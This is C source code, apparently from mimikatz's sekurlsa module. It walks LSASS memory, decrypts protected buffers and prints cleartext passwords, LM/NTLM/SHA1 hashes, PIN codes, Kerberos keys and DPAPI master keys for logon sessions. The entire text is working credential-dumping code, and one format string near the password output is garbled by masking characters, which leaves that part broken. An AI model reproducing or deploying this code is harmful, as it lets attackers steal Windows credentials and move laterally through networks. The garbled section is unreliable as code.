VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase)
{
switch(key->unkId)
{
case 0x00010002:
case 0x00010003:
dprintf("\n\t * NTLM : ");
break;
case 0x00020002:
dprintf("\n\t * SHA1 : ");
break;
case 0x00030002:
case 0x00030003:
dprintf("\n\t * RootKey : ");
break;
case 0x00040002:
case 0x00040003:
dprintf("\n\t * DPAPI : ");
break;
default:
dprintf("\n\t * %08x : ", key->unkId);
}
kull_m_string_dprintf_hex((PBYTE) *dirtyBase + sizeof(ULONG), key->length, 0);
*dirtyBase = (PBYTE) *dirtyBase + sizeof(ULONG) + *(PULONG) *dirtyBase;
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
ULONG_PTR ptr;
ULONG monNb = 0;
PBYTE buffer;
if(ReadMemory(pMasterKeyCacheList, &mesCredentials, sizeof(LIST_ENTRY), NULL))
{
ptr = (ULONG_PTR) mesCredentials.Flink;
while(ptr != pMasterKeyCacheList)
{
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_MASTERKEY_CACHE_ENTRY), NULL))
{
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
{
dprintf("\n\t [%08x]\n\t * GUID :\t", monNb++);
kull_m_string_displayGUID(&mesCredentials.KeyUid);
dprintf("\n\t * Time :\t"); kull_m_string_displayFileTime(&mesCredentials.insertTime);
if(buffer = (PBYTE) LocalAlloc(LPTR, mesCredentials.keySize))
{
if(ReadMemory(ptr + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key), buffer, mesCredentials.keySize, NULL))
{
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer, mesCredentials.keySize);
dprintf("\n\t * MasterKey :\t"); kull_m_string_dprintf_hex(buffer, mesCredentials.keySize, 0);
}
LocalFree(buffer);
}
}
ptr = (ULONG_PTR) mesCredentials.Flink;
}
else break;
}
}
else dprintf("KO");
}
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags)
{
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
PKERB_HASHPASSWORD_6 pHashPassword;
UNICODE_STRING buffer;
PVOID base;
DWORD type, i;
if(mesCreds)
{
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
{
type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
credentials = (PUNICODE_STRING) mesCreds;
if(credentials->Buffer)
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);
switch(type)
{
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
if(pPrimaryCreds->isLmOwfPassword)
{
dprintf("\n\t * LM : ");
kull_m_string_dprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
if(pPrimaryCreds->isNtOwfPassword)
{
dprintf("\n\t * NTLM : ");
kull_m_string_dprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
if(pPrimaryCreds->isShaOwPassword)
{
dprintf("\n\t * SHA1 : ");
kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
}
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base);
break;
default:
dprintf("\n\t * Raw data : ");
kull_m_string_dprintf_hex(credentials->Buffer, credentials->Length, 1);
}
}
}
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE)
{
if(mesCreds->UserName.Buffer)
{
if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength);
dprintf("\n\t * PIN code : %wZ", &mesCreds->UserName);
LocalFree(mesCreds->UserName.Buffer);
}
}
}
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
{
pHashPassword = (PKERB_HASHPASSWORD_6) mesCreds;
dprintf("\n\t\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size)
{
buffer.Buffer = (PWSTR) pHashPassword->Checksump;
if(kull_m_string_getDbgUnicodeString(&buffer))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer.Buffer, buffer.MaximumLength);
kull_m_string_dprintf_hex(buffer.Buffer, buffer.Length, 0);
LocalFree(buffer.Buffer);
}
}
else dprintf("<no size, buffer is incorrect>");
}
else
{
if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
{
if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName) && kull_m_string_suspectUnicodeString(&mesCreds->UserName))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
username = &mesCreds->UserName;
else
domain = &mesCreds->UserName;
}
if(kull_m_string_getDbgUnicodeString(&mesCreds->Domaine) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
domain = &mesCreds->Domaine;
else
username = &mesCreds->Domaine;
}
if(kull_m_string_getDbgUnicodeString(&mesCreds->Password) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/)
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength);
password = &mesCreds->Password;
}
if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY))
{
dprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ?
"%wZ\t%wZ\t"
:
"\n\t * Username : %wZ"
"\n\t * Domain : %wZ"
"\n\t * Password : "******"%.*S", password->Length / sizeof(wchar_t), password->Buffer);
else
dprintf("%wZ", password ? password : &uNull);
}
else kull_m_string_dprintf_hex(password->Buffer, password->Length, 1);
}
LocalFree(mesCreds->UserName.Buffer);
LocalFree(mesCreds->Domaine.Buffer);
LocalFree(mesCreds->Password.Buffer);
}
}
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE)
dprintf("\n");
}
else dprintf("LUID KO\n");
}
